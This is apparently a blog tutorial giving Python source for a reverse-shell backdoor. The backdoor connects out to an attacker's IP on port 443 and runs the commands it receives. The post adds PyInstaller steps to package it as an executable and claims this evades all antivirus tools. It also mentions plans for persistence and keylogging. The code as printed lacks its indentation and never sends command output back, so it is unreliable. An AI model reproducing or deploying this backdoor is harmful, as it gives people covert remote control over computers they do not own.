Writing Undetectable Backdoor in 13 lines


Today we are going to program a simple custom backdoor — a few lines of code — that totally avoids detection by every a/v out there. We’re gonna be writing this code in the Python programming language. If you don’t have the environment set up, never worry. I have another brief video/post showing you the requirements, click here to check it out.

The idea is to give you guys the power of creating your own backdoors instead of blatantly depending on crypters, third-party code (which isn’t always safe to use) and so on. In all honesty, I’m just as new to Python as most of you readers probably are — although if you check my about page, I do program in other languages — nevertheless I have faith that with a little effort we will be able to not only create a stealthier backdoor, but also add new features as well such as persistence, keylogging and maybe even a multi-threaded listener to control more than one client at a time.


Right now, this is mainly speculation and of course, the main aspect of this is not to have a shell to do bad things with it, but to learn how these protocols work in and out of Python — so yes, if you are interested in custom backdoors for another language, just drop a line.

Hopefully this tutorial will also become a series, so long as you guys — the readers — collaborate ideas to implement and help out as well to make a stealthier custom backdoor.

Credits on the code go out to Dave Kennedy and his work on building several Python shells.

Custom Shell

Here is the code used for the custom shell, just make sure to substitute anywhere with an underline for your own values, such as IP, port, etc.

import subprocess,socket
HOST = 'Your IP Adress'
PORT = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send('Hello There!')
while 1:
data = s.recv(1024)
if data == "quit": break
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdoutput = proc.stdout.read() + proc.stderr.read()
# loop ends here
s.send('Bye now!')

You can click here and download my copy of the backdoor and netcat. [ DOWNLOAD ]

I have seen this code in a few places, such as Dave K’s blog and the book “Foundations of Python Network Programming” both listed at the end of this post in the further readings section…

Compiling Executable

As mentioned in my previous post we will be using PyInstaller to create the stand-alone executable. It comes out pretty heavy for a shell (a few megs) but hey, works mint and completely undetectable.

Here is the code used for compiling the code, again, just replace the underlined part. Oh yea, make sure you are inside the PyInstaller directory as well… and that you have your code copied to that location.

python Configure.py
python Makespec.py --onefile shell.py
python Build.py shell\shell.spec

That’s about it, your executable should be ready to go — inside the /dist folder.


Check out the video for commentary explaining the code line by line…


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s